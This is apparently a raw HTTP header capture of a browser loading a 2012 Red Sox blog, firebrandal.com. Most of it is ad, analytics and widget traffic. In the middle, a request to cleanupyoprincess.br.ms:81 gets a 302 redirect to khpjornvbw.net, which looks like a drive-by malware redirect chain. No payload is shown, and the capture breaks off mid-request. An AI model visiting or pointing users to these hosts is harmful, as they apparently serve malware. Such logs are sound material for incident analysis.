Date: Mon, 05 Nov 2012 17:00:38 GMT
Server: cafe
Cache-Control: private
Content-Length: 10722
X-XSS-Protection: 1; mode=block
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Mon, 05 Nov 2012 13:12:13 GMT
Expires: Tue, 06 Nov 2012 01:12:13 GMT
Vary: Accept-Encoding
Age: 13705
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /wp-content/uploads/2012/07/hallofnearlygreat250x250.jpg HTTP/1.1

Host: www.hallofnearlygreat.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:37 GMT
Server: Apache
Last-Modified: Wed, 18 Jul 2012 03:46:12 GMT
Etag: &quot;2868021-1a2fb-4c512810c6900&quot;
Accept-Ranges: bytes
Content-Length: 107259
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
GET /remoteVisit.php?acct=2de79bffcdcb7dd83c27821260b1eebb&time=1352134838121 HTTP/1.1

Host: intensedebate.com
GET /remoteVisit.php?acct=2de79bffcdcb7dd83c27821260b1eebb&amp;time=1352134838121 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Mon, 05 Nov 2012 17:00:38 GMT
Content-Length: 58
Connection: close
P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot;
GET /menu/page.js HTTP/1.1

Host: static.addtoany.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 17:00:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Tue, 12 Jun 2012 22:34:24 GMT
Etag: &quot;1385f4c-c607-4c24e1184dc00&quot;
P3P: CP=&quot;ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT&quot;
Cache-Control: max-age=172800
Age: 1
Via: 1.1 vhost.phx3.nearlyfreespeech.net:3128 (squid/2.7.STABLE7)
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Encoding: gzip
GET /rem5.html HTTP/1.1

Host: cleanupyoprincess.br.ms:81

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Mon, 05 Nov 2012 17:02:07 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: nxshe5=_1_; domain=cleanupyoprincess.br.ms; path=/; expires=Tue, 06-Nov-2012 16:02:36 GMT nxshe3=_3_; domain=cleanupyoprincess.br.ms; path=/; expires=Tue, 06-Nov-2012 16:02:36 GMT nxshe16=_6_; domain=cleanupyoprincess.br.ms; path=/; expires=Tue, 06-Nov-2012 16:02:36 GMT
Location: http://khpjornvbw.net/links/majority_last_submitting.php
GET /pagead/imgad?id=CJiO462u1dGo_wEQrAIY-gEyCJrnrDr9EVCA HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3515913239267445&amp;output=html&amp;h=250&amp;slotname=6323475569&amp;w=300&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134837476&amp;bpp=4&amp;shv=r20121023&amp;jsv=r20110914&amp;prev_slotnames=0998046247&amp;correlator=1352134836584&amp;frm=20&amp;adk=3370988103&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=helvetica&amp;dfs=13&amp;adx=770&amp;ady=794&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=2&amp;dtd=89&amp;xpc=N0GGNbLLEj&amp;p=http%3A//firebrandal.com
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Date: Mon, 05 Nov 2012 16:59:32 GMT
Expires: Mon, 12 Nov 2012 16:59:32 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 31316
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 67
GET /button/checkOAuth.esi HTTP/1.1

Host: wd-edge.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/javascript
Server: nginx/0.8.53
Content-Length: 22
Vary: Accept-Encoding
Expires: Mon, 05 Nov 2012 17:00:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Nov 2012 17:00:39 GMT
Connection: keep-alive
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=1634450262&utmhn=firebrandal.com&utmcs=UTF-8&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Fire%20Brand%20of%20the%20American%20League%20%7C%20A%20Red%20Sox%20blog%20analyzing%20the%20Olde%20Towne%20Team%20since%202003&utmhid=1329589676&utmr=-&utmp=%2F&utmac=UA-10915612-1&utmcc=__utma%3D265617176.699239837.1352134837.1352134837.1352134837.1%3B%2B__utmz%3D265617176.1352134840.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=1634450262&amp;utmhn=firebrandal.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=1159x778&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=Fire%20Brand%20of%20the%20American%20League%20%7C%20A%20Red%20Sox%20blog%20analyzing%20the%20Olde%20Towne%20Team%20since%202003&amp;utmhid=1329589676&amp;utmr=-&amp;utmp=%2F&amp;utmac=UA-10915612-1&amp;utmcc=__utma%3D265617176.699239837.1352134837.1352134837.1352134837.1%3B%2B__utmz%3D265617176.1352134840.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:29:28 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 401471
Server: GFE/2.0
GET /pagead/images/adchoices/icon.png HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3515913239267445&amp;output=html&amp;h=250&amp;slotname=6323475569&amp;w=300&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134837476&amp;bpp=4&amp;shv=r20121023&amp;jsv=r20110914&amp;prev_slotnames=0998046247&amp;correlator=1352134836584&amp;frm=20&amp;adk=3370988103&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=helvetica&amp;dfs=13&amp;adx=770&amp;ady=794&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=2&amp;dtd=89&amp;xpc=N0GGNbLLEj&amp;p=http%3A//firebrandal.com
If-None-Match: 426692510519060060
HTTP/1.1 304 Not Modified

HTTP/1.1 304 Not Modified
Date: Mon, 05 Nov 2012 01:42:48 GMT
Expires: Tue, 06 Nov 2012 01:42:48 GMT
Etag: 426692510519060060
Age: 55071
Server: GFE/2.0
GET /pagead/images/adchoices/en.png HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3515913239267445&amp;output=html&amp;h=250&amp;slotname=6323475569&amp;w=300&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134837476&amp;bpp=4&amp;shv=r20121023&amp;jsv=r20110914&amp;prev_slotnames=0998046247&amp;correlator=1352134836584&amp;frm=20&amp;adk=3370988103&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=helvetica&amp;dfs=13&amp;adx=770&amp;ady=794&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=2&amp;dtd=89&amp;xpc=N0GGNbLLEj&amp;p=http%3A//firebrandal.com
If-None-Match: 8618641207806323095
HTTP/1.1 304 Not Modified

HTTP/1.1 304 Not Modified
Date: Mon, 05 Nov 2012 01:53:58 GMT
Expires: Tue, 06 Nov 2012 01:53:58 GMT
Etag: 8618641207806323095
Age: 54401
Server: GFE/2.0
GET /pagead/js/r20121023/r20110914/abg.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3515913239267445&amp;output=html&amp;h=250&amp;slotname=6323475569&amp;w=300&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134837476&amp;bpp=4&amp;shv=r20121023&amp;jsv=r20110914&amp;prev_slotnames=0998046247&amp;correlator=1352134836584&amp;frm=20&amp;adk=3370988103&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=helvetica&amp;dfs=13&amp;adx=770&amp;ady=794&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=2&amp;dtd=89&amp;xpc=N0GGNbLLEj&amp;p=http%3A//firebrandal.com
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 5725237117596964362
Date: Thu, 01 Nov 2012 01:09:11 GMT
Expires: Thu, 15 Nov 2012 01:09:11 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 327
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 402688
GET /menu/sm9.html HTTP/1.1

Host: a2a.lockerz.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 05 Nov 2012 17:00:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 02 May 2012 01:00:27 GMT
Etag: &quot;343e9ca-bdd-4bf03367fe0c0&quot;
P3P: CP=&quot;ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT&quot;
Cache-Control: max-age=315360000
Age: 12
Via: 1.1 vhost.phx4.nearlyfreespeech.net:3128 (squid/2.7.STABLE7)
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Encoding: gzip
GET /simgad/11497450677984357085 HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3256725667777155&amp;output=html&amp;h=90&amp;slotname=0998046247&amp;w=728&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134836387&amp;bpp=7&amp;shv=r20121023&amp;jsv=r20110914&amp;correlator=1352134836584&amp;frm=20&amp;adk=353781055&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=tahoma&amp;dfs=12&amp;adx=216&amp;ady=264&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=945&amp;xpc=qkZdIfVrBI&amp;p=http%3A//firebrandal.com
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Mon, 08 Oct 2012 09:50:26 GMT
Date: Mon, 05 Nov 2012 13:24:38 GMT
Expires: Tue, 05 Nov 2013 13:24:38 GMT
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28456
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 12961
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df180827f0492dbc%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F&node_type=link&width=285&font=false&layout=standard&colorscheme=light&show_faces=true&send=true&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df180827f0492dbc%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F&amp;node_type=link&amp;width=285&amp;font=false&amp;layout=standard&amp;colorscheme=light&amp;show_faces=true&amp;send=true&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: 6KllPeGEyxEVHn0Y3ub7PZKgjwxrspUPwtYg2qVq1FE=
Date: Mon, 05 Nov 2012 17:00:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /i/partners/sweetspot/sweetspot.css HTTP/1.1

Host: a.espncdn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://espn.go.com/mlb/sweetspot/localMod?site=firebrand
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Thu, 22 Apr 2010 20:18:02 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1903
Accept-Ranges: bytes
P3P: CP=&quot;CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE&quot;
Cache-Control: max-age=2419114
Date: Mon, 05 Nov 2012 17:00:40 GMT
Connection: keep-alive
GET /getSegment.php?purl=http%3A%2F%2Ffirebrandal.com%2F&jsref=&rnd=1352134839644 HTTP/1.1

Host: seg.sharethis.com
GET /getSegment.php?purl=http%3A%2F%2Ffirebrandal.com%2F&amp;jsref=&amp;rnd=1352134839644 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx/0.8.54
Date: Mon, 05 Nov 2012 17:00:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: &quot;policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM&quot;
Content-Encoding: gzip
GET /pview?event=pview&fpc=7639673-13ad1844d57-28c1214c-1&sessionID=1352134839639.15004&sourceURL=http%3A%2F%2Ffirebrandal.com%2F&hostname=firebrandal.com&location=%2F&publisher=wp.d97a5be8-7b46-40c2-aaaf-f7f9d7c886da&shareHash=sthash.yaMat7qu&incomingHash=&refDomain=&refQuery=&url=http%3A%2F%2Ffirebrandal.com%2F&sharURL=&source=share4x&title=Fire%20Brand%20of%20the%20American%20League%20%7C%20A%20Red%20Sox%20blog%20analyzing%20the%20Olde%20Towne%20Team%20since%202003&ts1352134839643.0= HTTP/1.1

Host: l.sharethis.com
GET /pview?event=pview&amp;fpc=7639673-13ad1844d57-28c1214c-1&amp;sessionID=1352134839639.15004&amp;sourceURL=http%3A%2F%2Ffirebrandal.com%2F&amp;hostname=firebrandal.com&amp;location=%2F&amp;publisher=wp.d97a5be8-7b46-40c2-aaaf-f7f9d7c886da&amp;shareHash=sthash.yaMat7qu&amp;incomingHash=&amp;refDomain=&amp;refQuery=&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;sharURL=&amp;source=share4x&amp;title=Fire%20Brand%20of%20the%20American%20League%20%7C%20A%20Red%20Sox%20blog%20analyzing%20the%20Olde%20Towne%20Team%20since%202003&amp;ts1352134839643.0= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Server: nginx/0.8.54
Date: Mon, 05 Nov 2012 17:00:39 GMT
Connection: keep-alive
Set-Cookie: __stid=CsFej1CX8Le4CAQ61FPIAg==; expires=Tue, 05-Nov-13 17:00:39 GMT; domain=.sharethis.com; path=/
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM&quot;
GET /orbserv/hbpix?pixId=2869&curl=http%3A%2F%2Ffirebrandal.com%2F HTTP/1.1

Host: map.media6degrees.com
GET /orbserv/hbpix?pixId=2869&amp;curl=http%3A%2F%2Ffirebrandal.com%2F HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 05 Nov 2012 17:00:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 16 Dec 2008 21:07:52 GMT
Etag: &quot;1d60111-2b-45e305a397a00&quot;
Accept-Ranges: bytes
Content-Length: 43
Connection: close
GET /pagead/images/google-logo.png HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3515913239267445&amp;output=html&amp;h=250&amp;slotname=6323475569&amp;w=300&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134837476&amp;bpp=4&amp;shv=r20121023&amp;jsv=r20110914&amp;prev_slotnames=0998046247&amp;correlator=1352134836584&amp;frm=20&amp;adk=3370988103&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=helvetica&amp;dfs=13&amp;adx=770&amp;ady=794&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=2&amp;dtd=89&amp;xpc=N0GGNbLLEj&amp;p=http%3A//firebrandal.com
HTTP/1.1 200 OK

Content-Type: image/png
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 13513653691308934734
Date: Mon, 05 Nov 2012 03:16:13 GMT
Expires: Tue, 06 Nov 2012 03:16:13 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 4114
X-XSS-Protection: 1; mode=block
Age: 49467
Cache-Control: public, max-age=86400
GET /pagead/images/x_button.png HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3515913239267445&amp;output=html&amp;h=250&amp;slotname=6323475569&amp;w=300&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134837476&amp;bpp=4&amp;shv=r20121023&amp;jsv=r20110914&amp;prev_slotnames=0998046247&amp;correlator=1352134836584&amp;frm=20&amp;adk=3370988103&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=helvetica&amp;dfs=13&amp;adx=770&amp;ady=794&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=2&amp;dtd=89&amp;xpc=N0GGNbLLEj&amp;p=http%3A//firebrandal.com
HTTP/1.1 200 OK

Content-Type: image/png
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 11716456811728123628
Date: Mon, 05 Nov 2012 02:46:38 GMT
Expires: Tue, 06 Nov 2012 02:46:38 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 159
X-XSS-Protection: 1; mode=block
Age: 51242
Cache-Control: public, max-age=86400
GET /pagead/images/x_button_dark.png HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
